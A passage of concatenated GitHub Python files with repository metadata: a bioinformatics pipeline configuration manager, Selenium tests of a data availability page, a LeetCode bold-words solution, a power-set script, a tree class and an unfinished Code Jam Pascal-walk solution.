EI-CoreBioinformatics/bgrrl | 18,597,208,408,245 | 26d2219287e4b7037c0632d835a89ee3a45a1a42 | 78d313bba7b57396c08ef3931748537bc5ac35a8 | /bgrrl/bgrrl_config.py | 51f8094abb5bae4982df6e58b1ce0f57b0e28e20 | []
| no_license | https://github.com/EI-CoreBioinformatics/bgrrl | 8c3ec9fb8f1c9ab330051f09b6ce20f105cc8fc8 | 46f2d2e66e559536ffa066f789c93f148537d31a | refs/heads/master | 2021-03-27T10:05:31.735977 | 2019-07-30T16:31:56 | 2019-07-30T16:31:56 | 116,812,059 | 0 | 0 | null | false | 2019-05-08T15:38:17 | 2018-01-09T12:15:10 | 2019-05-08T15:24:02 | 2019-05-08T15:38:16 | 928 | 0 | 0 | 10 | Python | false | false | from collections import OrderedDict, namedtuple
import os
from os.path import exists, dirname, basename, join
import sys
import yaml
import pathlib
import glob
from .snakemake_helper import *
ExecutionEnvironmentArguments = namedtuple(
"ExecutionEnvironmentArguments",
[
"scheduler",
"partition",
"no_drmaa",
"max_nodes",
"max_cores",
"hpc_config"
]
)
class ConfigurationManager(OrderedDict):
    """Base configuration manager for a pipeline run.

    Adopts all argparse arguments as attributes, prepares the output
    directory layout, resolves the HPC / main / MultiQC configuration
    files and builds the scheduler execution environment.
    """

    def __handle_config_file(self, config_file, config_type, file_pattern, warning=""):
        """Resolve one configuration file.

        Preference order: an explicitly supplied path (attribute named
        ``config_file``), then a file matching ``file_pattern`` inside the
        run's config directory (placed there by bginit).  The chosen path is
        stored in both ``<config_file>`` and ``<config_file>_file``.

        Raises:
            ValueError: when neither source yields a file; ``warning`` is
                appended to the message if given.
        """
        try:
            init_file = glob.glob(join(self.config_dir, file_pattern))[0]
        except IndexError:  # no matching file in the config dir
            init_file = ""
        if hasattr(self, config_file) and exists(getattr(self, config_file)):
            print("Custom {} file specified {}, overriding defaults.".format(config_type, getattr(self, config_file)))
            setattr(self, config_file + "_file", getattr(self, config_file))
        elif init_file:
            print("Found {} file at init location, using this.".format(config_type))
            setattr(self, config_file + "_file", init_file)
            setattr(self, config_file, init_file)
        else:
            raise ValueError(
                "No valid {} file specified.{}".format(
                    config_type,
                    ("\n" + warning) if warning else ""
                )
            )

    def __handle_output_dir(self, output_dir, overwrite=False):
        """Create the run's directory tree and return whether ``output_dir``
        already existed (i.e. whether this run is a resume).

        Creates hpc_logs/, config/ and reports/ under ``output_dir`` plus a
        Data_Package directory (note: relative to the current working
        directory, not to ``output_dir``).
        """
        outdir_exists = exists(output_dir)
        if outdir_exists:
            if overwrite:
                print(
                    "Output directory already exists and overwrite was requested (-f option). Deleting directory contents ... ",
                    end="", flush=True
                )
                # Deliberately a no-op: wiping the directory caused data
                # loss in the past, so -f only prints this notice.
                print("DEACTIVATED DUE TO TOO MANY ACCIDENTS.")
            else:
                print("Output directory already exists, attempting to resume.", flush=True)
        else:
            pathlib.Path(output_dir).mkdir(parents=True, exist_ok=True)

        def _create_subdir(subdir, name):
            # Create subdir (with parents) if missing and return its path.
            if not exists(subdir):
                print(name + " does not exist. Creating " + subdir + " now ... ", end="", flush=True)
                pathlib.Path(subdir).mkdir(parents=True, exist_ok=True)
                print("done.")
            return subdir

        self.logs_dir = _create_subdir(join(output_dir, "hpc_logs"), "HPC log dir")
        self.config_dir = _create_subdir(join(output_dir, "config"), "Config dir")
        self.report_dir = _create_subdir(join(output_dir, "reports"), "Report dir")
        self.package_dir = _create_subdir("Data_Package", "Package dir")
        print()
        return outdir_exists

    def __make_exe_env_args(self):
        """Bundle the scheduler attributes into the namedtuple consumed by
        ExecutionEnvironment."""
        return ExecutionEnvironmentArguments(
            self.scheduler,
            self.partition,
            self.no_drmaa,
            self.max_nodes,
            self.max_cores,
            self.hpc_config
        )

    def __make_exe_env(self):
        """Instantiate the scheduler/DRMAA execution environment."""
        print("Configuring execution environment ... ", end="", flush=True)
        self.exe_env = ExecutionEnvironment(
            self.__make_exe_env_args(),
            NOW,
            job_suffix=self.input + "_" + self.output_dir,
            log_dir=self.logs_dir
        )
        print("done.")
        print(str(self.exe_env))

    def generate_config_file(self, module):
        """Write the merged configuration (file-based config plus runtime
        attributes) to ``<config_dir>/<module>.conf.yaml``.

        Returns:
            str: path of the written configuration file.
        """
        config_file = join(self.config_dir, module + ".conf.yaml")
        with open(config_file, "wt") as cfg_out:
            config_d = OrderedDict(self._config)
            # Fold in every runtime attribute that the file-based config
            # does not already define.
            for k, v in sorted(vars(self).items()):
                if not k in self._config and k != "_config":
                    print("WRITING {}: {} -> CONFIG".format(k, v))
                    config_d[k] = v
            print("Writing configuration to file {} ... ".format(config_file), end="", flush=True)
            yaml.dump(config_d, cfg_out, default_flow_style=False)
            print("done.")
        return config_file

    def __init__(self, ap_args):
        """Build the configuration from an argparse namespace ``ap_args``."""
        # Adopt all command line arguments as attributes.
        for k, v in vars(ap_args).items():
            setattr(self, k, v)

        # Accept either 'input' or the legacy 'input_sheet' argument.
        if not hasattr(self, "input"):
            try:
                self.input = self.input_sheet
            except AttributeError:
                raise ValueError("Configuration has neither 'input' nor 'input_sheet' attribute.")

        # Make sure the output directory tree exists (also sets
        # logs/config/report/package dir attributes).
        self.__handle_output_dir(self.output_dir, overwrite=self.force)

        # Handle hpc configuration.
        self.__handle_config_file(
            "hpc_config",
            "HPC configuration",
            "hpc_config.json",
            warning=self.alt_hpc_config_warning if hasattr(self, "alt_hpc_config_warning") else "")

        # Hand this over to ExecutionEnvironment.
        self.__make_exe_env()

        # Handle main configuration.
        self.__handle_config_file(
            "config",
            "configuration",
            "bgrrl_config.yaml",
            warning=self.alt_config_warning if hasattr(self, "alt_config_warning") else "")

        # Load configuration. yaml.load without an explicit Loader is
        # deprecated since PyYAML 5.1 and a TypeError on PyYAML >= 6;
        # safe_load also refuses arbitrary python-object tags.
        print("Loading configuration from {} ... ".format(self.config_file), end="", flush=True)
        with open(self.config_file) as cfg_in:
            self._config = yaml.safe_load(cfg_in)
        print("done.")
        print()

        self._config["out_dir"] = self.output_dir

        # Get multiqc configuration for qaa.
        self.__handle_config_file(
            "multiqc_config",
            "MultiQC configuration",
            "multiqc_config.yaml",
            warning=self.alt_multiqc_config_warning if hasattr(self, "alt_multiqc_config_warning") else "")

    def __str__(self):
        return super(ConfigurationManager, self).__str__() + "\n" + str(self.exe_env)

    def setConfiguration(self):
        # Placeholder hook; intentionally a no-op in the base class.
        pass
class BGRRLConfigurationManager(ConfigurationManager):
    """Configuration manager for bgrrl runs: layers bgrrl-specific settings
    (prokka/ratt flags, contig length filter, package layout) on top of the
    base ConfigurationManager and builds argument bundles for qaa."""

    def __manage(self):
        """Merge bgrrl-specific runtime options into self._config."""
        cfg_d = {
            "etc": join(dirname(__file__), "..", "etc"),
            "cwd": os.getcwd(),
            "reapr_correction": False,
            "run_prokka": self.runmode == "annotate" or (hasattr(self, "run_annotation") and self.run_annotation),
            "run_ratt": False,
            "package_dir": self.package_dir,
        }
        self._config.update(cfg_d)

        if hasattr(self, "project_prefix"):
            # Normalise a None prefix to the empty string.
            prefix = self.project_prefix if self.project_prefix is not None else ""
            self._config["project_prefix"] = prefix

        if hasattr(self, "prokka_package_style"):
            self._config["prokka_package_style"] = self.prokka_package_style

        if hasattr(self, "contig_minlen"):
            # Clamp negative values to 0.
            self._config["asm_lengthfilter_contig_minlen"] = max(0, self.contig_minlen)

        # ratt only runs when a reference was supplied; validate its path.
        self._config["run_ratt"] = hasattr(self, "ratt_reference") and self.ratt_reference is not None
        if self._config["run_ratt"]:
            if not exists(self.ratt_reference):
                raise ValueError("Invalid ratt reference location: " + self.ratt_reference)
            self._config["ratt_reference"] = self.ratt_reference
            if hasattr(self, "make_ratt_data_tarballs"):
                self._config["make_ratt_data_tarballs"] = self.make_ratt_data_tarballs

    def __init__(self, ap_args):
        # Warning strings consumed by the base class when a config file
        # cannot be resolved; must be set before super().__init__ runs.
        self.alt_hpc_config_warning = "Please run bginit or provide a valid HPC configuration file with --hpc_config."
        self.alt_config_warning = "Please run bginit or provide a valid configuration file with --bgrrl_config/--config."
        self.alt_multiqc_config_warning = "Please run bginit to obtain a valid MultiQC configuration file template."

        super(BGRRLConfigurationManager, self).__init__(ap_args)
        self.__manage()

    def create_qaa_args(self, stage="init"):
        """Build a QAA arguments adapter for the given pipeline stage.

        NOTE(review): the adapter is always seeded from the "init" stage
        template regardless of `stage` — looks intentional (base defaults),
        but confirm.
        """
        from qaa.qaa_args import QAA_ArgumentsAdapter as QAA_Args
        from .qaa_helpers import STAGE_QAA_ARGS
        qaa_args = QAA_Args(**STAGE_QAA_ARGS["init"])
        qaa_args.update(
            quast_mincontiglen=1000,
            project_prefix=self.project_prefix,
            config=self.config_file,
            hpc_config=self.hpc_config_file,
            multiqc_config=self.multiqc_config_file,
            normalized=not self.no_normalization if hasattr(self, "no_normalization") else True,
            multiqc_dir=join(self.report_dir, "multiqc", stage.split(",")[0])
        )

        if not stage == "init":
            qaa_args.update(**vars(self))
            if stage == "asm,ann":
                # Combined assembly+annotation stage gets the asm template
                # plus an extended qaa mode.
                qaa_args.update(**STAGE_QAA_ARGS["asm"])
                qaa_args.update(**{
                    "qaa_mode": "genome,transcriptome,proteome",
                    "runmode": "asm,ann"
                })
            else:
                try:
                    qaa_args.update(**STAGE_QAA_ARGS[stage])
                except:
                    raise ValueError("Invalid stage '{}' in BCM::create_qaa_args().".format(stage))
        return qaa_args
| UTF-8 | Python | false | false | 8,823 | py | 39 | bgrrl_config.py | 26 | 0.672451 | 0.671657 | 0 | 276 | 30.945652 | 115 |
gchen-aa/webdriver | 14,267,881,373,432 | 9321be3a635454f55a4ac123f3dbf1423242bf3d | 9376cc79f283833d7e20b4a1ef11624945920965 | /tests/qa/cases/intelligence/data_availablity/test_audience_users.py | 692520dcd37b0dade241fa41a7dd37cea9215fad | []
| no_license | https://github.com/gchen-aa/webdriver | a9a32fcda82ded537db00f76b028012af637a667 | ab23848ee613e82e91b117b7b95d7a46cdc48e31 | refs/heads/master | 2017-10-07T15:08:30.289207 | 2017-02-13T00:25:52 | 2017-02-13T00:25:52 | 81,275,678 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Copyright (c) 2016 App Annie Inc. All rights reserved.
from tests.qa.base import BaseSeleniumTestCase
from tests.qa.cases.intelligence.data_availablity.utility import ContractAvailabilityMixin
from tests.qa.constants.constants import Devices, RELATED_APPS_SUPPORTED_COUNTRIES
from tests.qa.pages.intelligence.data_avaliability import DataAvailabilityPage
from tests.qa.utils import logger
from tests.qa.utils.basic_utils import get_list_intersection
from tests.qa.utils.datetime_utils import get_max_datetime
from tests.qa.utils.product_utils import get_market_from_device, find_ids_by_stores
from tests.qa.utils.user_utils import get_contract_by_email_device
class AudienceAvailabilityChecker(BaseSeleniumTestCase, ContractAvailabilityMixin):
    """Selenium checks that the Data Availability page shows each test
    account's Audience contract correctly (data sets, countries, dates,
    categories, delivery methods).

    Python 2 code (uses dict.iteritems()).  Each cNNNNN-prefixed test name
    presumably maps to a case id in the team's test tracker — confirm.
    """

    def _get_delivery_frequency(self, has_web_reports, has_api, has_file_reports):
        """Delivery methods with ' - Monthly' appended to Web/File Reports."""
        deliver_method = self._get_summary_delivery_method(has_web_reports, has_api, has_file_reports)
        return [''.join([item, ' - Monthly']) if item in ('Web', 'File Reports') else item for item in deliver_method]

    def _get_summary_other(self, report_types, countries, categories):
        """Pluralised summary strings, e.g. '2 Data Sets', '1 Country'."""
        return [
            ' '.join([str(len(self.filter_audience_report_type(report_types))), 'Data Set' if len(
                self.filter_audience_report_type(report_types)) <= 1 else 'Data Sets']),
            ' '.join([str(len(countries)), 'Country' if len(countries) <= 1 else 'Countries']),
            ' '.join([str(len(categories)), 'Category' if len(categories) <= 1 else 'Categories']),
        ]

    def _compose_expect_contract(self, user, device, filters=None, start_date=None, end_date=None):
        """Build the expected contract card (dict) for user/device from the
        contract fixtures.

        `filters` narrows the contract lookup; `start_date`/`end_date`
        override the contract's own period when given.
        """
        result = {}
        contract_info = get_contract_by_email_device(user, device, filters)
        result['Estimation Period'] = self._get_estimation_periods(contract_info['estimation_period'])
        result['Categories'] = contract_info['category']
        result['name'] = ' '.join(
            ['Audience -', Devices.get_description(contract_info['device']),
             self._get_package_type(contract_info['package_type_id'])])
        result['summary_delivery_method'] = self._get_summary_delivery_method(
            contract_info['has_web_reports'], contract_info['has_api'], contract_info['has_file_reports'])
        # Only countries supported by Related Apps for this device count.
        countries = get_list_intersection(
            contract_info['country'], find_ids_by_stores(RELATED_APPS_SUPPORTED_COUNTRIES, device))
        result['Countries'] = countries
        result['Data Sets'] = self.fix_data_sets(contract_info['report_type'])
        result['Delivery'] = self._get_delivery_frequency(
            contract_info['has_web_reports'], contract_info['has_api'], contract_info['has_file_reports'])
        # Data before 2013-01-01 is never shown, hence the clamp.
        start_date = start_date if start_date else get_max_datetime(contract_info['start_date'], '2013-01-01')
        end_date = end_date if end_date else contract_info['end_date']
        result['summary_period'] = self._get_summary_period(start_date, end_date)
        result['summary_other'] = self._get_summary_other(
            contract_info['report_type'], countries, contract_info['category'])
        market = get_market_from_device(contract_info['device'])
        result['Market'] = self.get_market_text(contract_info, market)
        result['Methodology'] = self._get_methodology_method(contract_info['usage_methodologies'])
        return result

    def _check_audience_contracts(self, user, expect_contracts):
        """Open the Data Availability page as `user` and assert each shown
        contract matches the corresponding expected dict.

        NOTE(review): zip() silently truncates when the page shows a
        different number of contracts than expected — no length assertion.
        """
        page = DataAvailabilityPage(self.selenium).prepare_data_availability_page(user)
        actual_contracts = page.get_all_contracts_info()
        for actual_contract, expect_contract in zip(actual_contracts, expect_contracts):
            for key, value in actual_contract.iteritems():
                logger.debug('key: [{}]'.format(key))
                logger.debug('expect value: [{}]'.format(expect_contract[key]))
                logger.debug('actual value: [{}]'.format(actual_contract[key]))
                if isinstance(value, list):
                    # Lists are compared order-insensitively.
                    self.assertEqual(sorted(expect_contract[key]), sorted(value))
                else:
                    self.assertEqual(expect_contract[key], value)

    def c37148_demographics_only_test(self):
        user = 'audience_demo@appannie-int.com'
        device = Devices.IOS
        expect_contract = self._compose_expect_contract(user, device)
        self._check_audience_contracts(user, [expect_contract])

    def c37149_related_apps_only_test(self):
        user = 'audience_related_apps@appannie-int.com'
        device = Devices.IOS
        expect_contract = self._compose_expect_contract(user, device)
        self._check_audience_contracts(user, [expect_contract])

    def c37150_audience_ep_1month_test(self):
        user = 'audience_1month@appannie-int.com'
        device = Devices.IOS
        expect_contract = self._compose_expect_contract(user, device)
        self._check_audience_contracts(user, [expect_contract])

    def c37151_audience_ep_3months_test(self):
        user = 'audience_3month@appannie-int.com'
        device = Devices.IOS
        expect_contract = self._compose_expect_contract(user, device)
        self._check_audience_contracts(user, [expect_contract])

    def c37152_audience_country_jp_test(self):
        user = 'audience_jp@appannie-int.com'
        device = Devices.IOS
        expect_contract = self._compose_expect_contract(user, device)
        self._check_audience_contracts(user, [expect_contract])

    def c37153_audience_all_country_test(self):
        user = 'audience_all_language@appannie-int.com'
        expect_contract = self._compose_expect_contract(user, Devices.IOS)
        self._check_audience_contracts(user, [expect_contract])

    def c37154_audience_category_test(self):
        social_user = 'audience_social@appannie-int.com'
        social_expect_contract = self._compose_expect_contract(social_user, Devices.ANDROID)
        self._check_audience_contracts(social_user, [social_expect_contract])

    def c37155_audience_ios_test(self):
        user = 'audience_ios@appannie-int.com'
        device = Devices.IOS
        expect_contract = self._compose_expect_contract(user, device)
        self._check_audience_contracts(user, [expect_contract])

    def c37156_audience_gp_test(self):
        user = 'audience_gp@appannie-int.com'
        device = Devices.ANDROID
        expect_contract = self._compose_expect_contract(user, device)
        self._check_audience_contracts(user, [expect_contract])

    def c37157_audience_no_api_test(self):
        user = 'audience_no_api@appannie-int.com'
        expect_contract = self._compose_expect_contract(user, Devices.IOS)
        self._check_audience_contracts(user, [expect_contract])

    def c37158_audience_no_web_test(self):
        user = 'audience_no_web@appannie-int.com'
        expect_contract = self._compose_expect_contract(user, Devices.IOS)
        self._check_audience_contracts(user, [expect_contract])

    def c37159_audience_no_file_test(self):
        user = 'audience_no_file@appannie-int.com'
        expect_contract = self._compose_expect_contract(user, Devices.IOS)
        self._check_audience_contracts(user, [expect_contract])

    def c37161_audience_2012_06_test(self):
        # One account holding both an iOS and a Google Play contract.
        user = 'audience_june@appannie-int.com'
        ios_expect_contract = self._compose_expect_contract(user, Devices.IOS)
        gp_expect_contract = self._compose_expect_contract(user, Devices.ANDROID)
        self._check_audience_contracts(user, [ios_expect_contract, gp_expect_contract])

    def c37162_audience_date_combination_test(self):
        # Multiple contracts distinguished by start_date filters; display
        # periods are clamped to 2014-05-01.
        user = 'audience_date_combination@appannie-int.com'
        ios_expect_contract_06 = self._compose_expect_contract(user, Devices.IOS, filters={
            "start_date": '2014-06-01'}, start_date='2014-05-01')
        ios_expect_contract_05 = self._compose_expect_contract(user, Devices.IOS, filters={
            "start_date": '2014-05-01'})
        gp_expect_contract_06 = self._compose_expect_contract(user, Devices.ANDROID, filters={
            "start_date": '2014-06-01'}, start_date='2014-05-01')
        self._check_audience_contracts(user, [ios_expect_contract_06, ios_expect_contract_05, gp_expect_contract_06])

    def c37163_audience_half_month_test(self):
        # Contracts whose period ends mid-month.
        user = 'audience_half_month@appannie-int.com'
        ios_expect_contract = self._compose_expect_contract(
            user, Devices.IOS, start_date='2013-05-01', end_date='2013-06-15')
        gp_expect_contract = self._compose_expect_contract(
            user, Devices.ANDROID, start_date='2013-05-01', end_date='2013-07-15')
        self._check_audience_contracts(user, [gp_expect_contract, ios_expect_contract])

    def c37164_audience_api_combination_test(self):
        # Four contracts: (iOS/GP) x (with/without API access).
        user = 'audience_api_combination@appannie-int.com'
        ios_expect_contract_api = self._compose_expect_contract(user, Devices.IOS, filters={"has_api": True})
        ios_expect_contract_noapi = self._compose_expect_contract(user, Devices.IOS, filters={"has_api": False})
        gp_expect_contract_api = self._compose_expect_contract(user, Devices.ANDROID, filters={"has_api": True})
        gp_expect_contract_noapi = self._compose_expect_contract(user, Devices.ANDROID, filters={"has_api": False})
        self._check_audience_contracts(user, [
            ios_expect_contract_api,
            ios_expect_contract_noapi,
            gp_expect_contract_api,
            gp_expect_contract_noapi])

    def c37165_audience_date_category_combination_test(self):
        user = 'audience_date_category@appannie-int.com'
        ios_expect_contract_06 = self._compose_expect_contract(user, Devices.IOS, filters={
            "start_date": '2016-04-01'}, start_date='2016-04-01')
        gp_expect_contract_06 = self._compose_expect_contract(user, Devices.ANDROID, filters={
            "start_date": '2016-04-01'}, start_date='2016-04-01')
        ios_expect_contract_05 = self._compose_expect_contract(user, Devices.IOS, filters={
            "start_date": '2016-06-01'}, start_date='2016-04-01')
        gp_expect_contract_05 = self._compose_expect_contract(user, Devices.ANDROID, filters={
            "start_date": '2016-06-01'}, start_date='2016-04-01')
        self._check_audience_contracts(user, [
            ios_expect_contract_06,
            ios_expect_contract_05,
            gp_expect_contract_06,
            gp_expect_contract_05])

    def c37166_audience_package_type_test(self):
        user = 'audience_package_type@appannie-int.com'
        expect_contract = self._compose_expect_contract(user, Devices.ANDROID)
        self._check_audience_contracts(user, [expect_contract])

    def c37167_audience_no_active_test(self):
        user = 'audience_no_active@appannie-int.com'
        expect_contract = self._compose_expect_contract(user, Devices.ANDROID, start_date='2010-01-01')
        self._check_audience_contracts(user, [expect_contract])
| UTF-8 | Python | false | false | 10,888 | py | 812 | test_audience_users.py | 809 | 0.669728 | 0.64291 | 0 | 193 | 55.414508 | 118 |
953250587/leetcode-python | 25,769,823,449 | adbfdfc598381249eb9d7859ebb6d5b0e38b5209 | f71aecb0e91fe877af3ec652c7f6753a1e7b5ccd | /BoldWordsInString_758.py | 701e5b8be739a6917f319137f5f1f9e985bc404b | []
| no_license | https://github.com/953250587/leetcode-python | 036ad83154bf1fce130d41220cf2267856c7770d | 679a2b246b8b6bb7fc55ed1c8096d3047d6d4461 | refs/heads/master | 2020-04-29T12:01:47.084644 | 2019-03-29T15:50:45 | 2019-03-29T15:50:45 | 176,122,880 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Given a set of keywords words and a string S, make all appearances of all keywords in S bold. Any letters between <b> and </b> tags become bold.
The returned string should use the least number of tags possible, and of course the tags should form a valid combination.
For example, given that words = ["ab", "bc"] and S = "aabcd", we should return "a<b>abc</b>d". Note that returning "a<b>a<b>b</b>c</b>d" would use more tags, so it is incorrect.
Note:
words has length in range [0, 50].
words[i] has length in range [1, 10].
S has length in range [0, 500].
All characters in words[i] and S are lowercase letters.
"""
import numpy as np
class Solution(object):
    def boldWords(self, words, S):
        """
        :type words: List[str]
        :type S: str
        :rtype: str

        O(n^2)-table approach: mark every span S[i:j+1] that equals a
        keyword, keep the longest match per start index, merge overlapping
        or adjacent spans, then wrap each merged span in <b>...</b>.
        (Debug prints and the numpy table dump were removed; output is
        unchanged.)
        """
        words = set(words)
        l = len(S)
        # dp[i][j] is True when S[i:j+1] is one of the keywords.
        dp = [[False] * l for _ in range(l)]
        for i in range(l):
            for j in range(i, l):
                if S[i: j + 1] in words:
                    dp[i][j] = True
        # For each start index keep its longest keyword match.
        a = []
        for i in range(l):
            for j in range(l - 1, -1, -1):
                if dp[i][j]:
                    a.append([i, j])
                    break
        if a == []:
            return S
        # Merge spans that overlap or touch (next start <= end + 1).
        start = a[0][0]
        end = a[0][1]
        result = []
        for i in a[1:]:
            if i[0] <= end + 1:
                end = max(end, i[1])
            else:
                result.append([start, end])
                start = i[0]
                end = i[1]
        result.append([start, end])
        # Stitch plain text and bolded spans together.
        ans = ''
        start = 0
        for i in result:
            ans += S[start:i[0]] + '<b>' + S[i[0]:i[1] + 1] + '</b>'
            start = i[1] + 1
        ans += S[start:]
        return ans

    def boldWords_1(self, words, S):
        """
        :type words: List[str]
        :type S: str
        :rtype: str

        Faster variant (55ms): flag every bold character using str.find for
        each word, then emit tags around each maximal run of flags.
        """
        n = len(S)
        b = [False] * n
        for w in words:
            t = S.find(w)
            l = len(w)
            while t > -1:
                for i in range(t, t + l):
                    b[i] = True
                t = S.find(w, t + 1)
        ans = ''
        i = 0
        while i < n:
            if b[i]:
                ans += r'<b>'
                while i < n and b[i]:
                    ans += S[i]
                    i += 1
                ans += r'</b>'
            else:
                ans += S[i]
                i += 1
        return ans
if __name__ == '__main__':
    # Demo invocation; guarded so importing this module stays silent.
    print(Solution().boldWords_1(words=["ab", "bc"], S="aabcd"))
ges0531/TIL | 2,310,692,453,161 | 4769ce08b0a627c4447776415d71ebf125c73c27 | ad054cebf4198f25d6ca9b37b0eef4783762ac04 | /Algorithm/개념정리/순열/순열, 조합, 부분집합/부분집합.py | bd0b67c0fb1b40cafbf9e89a77be2ae913c63327 | []
| no_license | https://github.com/ges0531/TIL | 4888d0bde5f84ad80caac63ffecf247d22daa0bf | 54389b30e0a67f9c9a3329b1b59c43cdbb33a62c | refs/heads/master | 2023-01-10T23:51:37.409124 | 2020-08-01T07:42:23 | 2020-08-01T07:42:23 | 195,916,245 | 0 | 0 | null | false | 2023-01-05T01:18:07 | 2019-07-09T02:17:43 | 2020-08-01T07:42:32 | 2023-01-05T01:18:05 | 36,278 | 0 | 0 | 89 | Python | false | false | import sys
sys.stdin = open('input.txt', 'r')
def power_set(k, N, arr, t):
if k == N:
print(t)
else:
t[k] = arr[k]
power_set(k+1, N, arr, t)
t[k] = 0
power_set(k + 1, N, arr, t)
num_list = list(map(int, input().split()))
N = len(num_list)
t = [0]*N
power_set(0, N, num_list, t) | UTF-8 | Python | false | false | 328 | py | 492 | 부분집합.py | 421 | 0.484756 | 0.469512 | 0 | 17 | 18.352941 | 42 |
thomascherickal/SofaStatistics | 10,118,942,956,078 | 107455a6cf975adc130b0901c68a1134cf43e02a | bf71eb82d374f23277305decdc7983861e91eda8 | /sofastats/tree.py | 844acc54948e5601e31d476230c9fd205927d4f4 | []
| no_license | https://github.com/thomascherickal/SofaStatistics | 7bbfd6dda7225c67cf7fde8d25ff7b3ab3dab561 | 71a353ff0f32214bb984880f4671e08fb8753920 | refs/heads/master | 2020-06-07T08:17:10.515444 | 2019-06-16T00:19:53 | 2019-06-16T00:19:53 | 192,967,592 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from . import my_exceptions
class Nodes:
    """
    Traversal helpers shared by Node and NodeTree.
    """

    def add_child(self, child_node):
        """
        Attach child_node under this node (or under the tree's root when
        called on a NodeTree), setting its level and parent.
        Returns child node.
        """
        parent = self.root_node if isinstance(self, NodeTree) else self
        child_node.level = parent.level + 1
        child_node.parent = parent
        parent.children.append(child_node)
        return child_node

    def get_depth(self):
        "Get tree depth (including root node)"
        start = self.root_node if isinstance(self, NodeTree) else self
        child_depths = [child.get_depth() for child in start.children]
        return max(child_depths) + 1 if child_depths else 1

    def get_terminal_nodes(self):
        "Gets list of terminal nodes"
        if isinstance(self, NodeTree):
            if not self.root_node.children:
                raise my_exceptions.NoNodes
            start = self.root_node
        else:
            start = self
        if not start.children:
            return [start]
        leaves = []
        for child in start.children:
            leaves.extend(child.get_terminal_nodes())
        return leaves

    def gener_node(self):
        # Pre-order traversal: this node first, then all descendants.
        yield self
        for child in self.children:
            yield from child.gener_node()
class NodeTree(Nodes):
    """
    Object names follow standard tree data structure terminology of root, nodes,
    subtrees, terminal nodes, parent, child, sibling, and tree depth.
    Nodes can only have one parent. All nodes come from root.
    """
    def __init__(self):
        self.root_node = Node(label='Root')
        self.root_node.level = 0

    def print_children(self, node):
        """Return an indented, line-per-node rendering of node's descendants."""
        l = []
        for child_node in node.children:
            l.append(str(child_node))
            # Recurse once and reuse the result; the original rendered each
            # subtree twice, making rendering exponential in tree depth.
            children_str = self.print_children(child_node)
            if children_str:  # otherwise an empty string would get its own line
                l.append(children_str)
        return '\n'.join(l)

    def __str__(self):
        l = []
        l.append(str(self.root_node))
        l.append(self.print_children(self.root_node))
        return '\n'.join(l)
class Node(Nodes):
    """
    A tree node with an optional details dictionary and a text label.
    The level is set when the node is added to a tree or another node;
    parent is set when added to a node (None when added to a tree directly);
    children grows as child nodes are attached.
    """
    def __init__(self, dets_dic=None, label=''):
        self.dets_dic = dets_dic or {}
        self.level = None
        self.parent = None
        self.children = []
        self.label = label

    def __str__(self):
        indent = self.level * 2 * ' '
        child_labels = ', '.join([child.label for child in self.children])
        return (f'{indent}Level: {self.level}; Label: {self.label}'
                f'; Details: {self.dets_dic}; Child labels: {child_labels}')
SoluMilken/algo_zoo | 9,586,367,055,083 | b978ac3650db19812d6a968f02ec9ef79c12a1f6 | 7509f42b3df460d95d19cb80a3d490600312064f | /codejam2020/round1a/p2.py | fad9e1b952411dd2986196370aa0ae84aba70063 | []
| no_license | https://github.com/SoluMilken/algo_zoo | 4ed5808c67f37ec083f6ee43d2e5932c10cf4a43 | 1ad76a0da6cfb60b27e5eb121ab5f79cf8b0fee3 | refs/heads/master | 2023-07-25T14:46:20.406426 | 2021-09-02T13:20:07 | 2021-09-02T13:20:07 | 402,423,807 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import math
def p2(n):
if n == 1:
return [(1, 1)]
if n <= 1000:
r = 1
k = 1
output_steps = [(1, 1)]
visited = {(1, 1): 1}
cum_score = 1
else:
r, k, output_steps, visited, cum_score = init2(n)
print(r, k, output_steps, visited, cum_score)
if cum_score == n:
return output_steps
output = recur(
r=r,
k=k,
output_steps=output_steps,
visited=visited,
cum_score=cum_score,
target=n,
)
return output
def init1(n):
    '''
    Seed the search by zig-zagging through the first floor(log2(n+1)) full
    layers of Pascal's triangle (a full layer i contributes 2**(i-1)).

    Returns (r, k, output_steps, visited, cum_score): current cell, path so
    far, visited map and total collected.  Also warms the COMB memo via
    get_score.  NOTE(review): this helper appears unused — p2() seeds via
    init2() instead.
    '''
    # n ~ = 2^k - 1
    f = math.log(n + 1, 2)
    layer_floor = math.floor(f)
    layer_ceil = math.ceil(f)

    # get r, k: the cell to continue from; odd layers are walked
    # left-to-right, even layers right-to-left (zig-zag).
    if layer_floor == layer_ceil:
        r = layer_floor # no need next step
        if layer_floor % 2 == 1:
            k = r
        else:
            k = 1
    else:
        r = layer_floor + 1 # need next step
        if r % 2 == 1:
            k = 1
        else:
            k = r

    output_steps = []
    visited = {}
    for i in range(1, layer_floor + 1):
        if i % 2 == 1:
            columns = range(1, i + 1)
        else:
            columns = range(i, 0, -1)
        for j in columns:
            output_steps.append((i, j))
            visited[(i, j)] = 1
            get_score(i, j)  # result discarded; called to populate the COMB memo

    # for next step: step into the first cell of the next layer (value 1).
    if layer_floor != layer_ceil:
        output_steps.append((r, k))
        visited[(r, k)] = 1

    # cum score: full layers sum to 2**layer_floor - 1, plus 1 for the
    # extra boundary cell when one was taken.
    cum_score = 2**layer_floor - 1
    if layer_floor != layer_ceil:
        cum_score += 1
    return r, k, output_steps, visited, cum_score
def init2(n):
    '''
    Seed the search by walking down the middle of Pascal's triangle
    (cell (i+1, ceil((i+1)/2)) per layer) while the cumulative layer maxima
    stay below two thirds of n.

    Returns (r, k, output_steps, visited, cum_score).  Relies on the
    module-level MAX_STEPS and CUM_MAX_VALUE_IN_LAYER tables built in
    __main__.  NOTE(review): if the very first layer already exceeds
    half_n, r/k are never assigned and the return raises UnboundLocalError
    — presumably unreachable for the n this is called with; confirm.
    '''
    half_n = int(n * (2/ 3))
    output_steps = []
    visited = {}
    for i in range(MAX_STEPS):
        if half_n > CUM_MAX_VALUE_IN_LAYER[i]:
            # Middle cell of layer i+1 (1-indexed).
            x = i + 1
            y = math.ceil((i+1) / 2)
            output_steps.append((x, y))
            visited[(x, y)] = 1
            cum_score = CUM_MAX_VALUE_IN_LAYER[i]
            r = x
            k = y
        else:
            break
    return r, k, output_steps, visited, cum_score
def recur(r, k, output_steps, visited, cum_score, target):
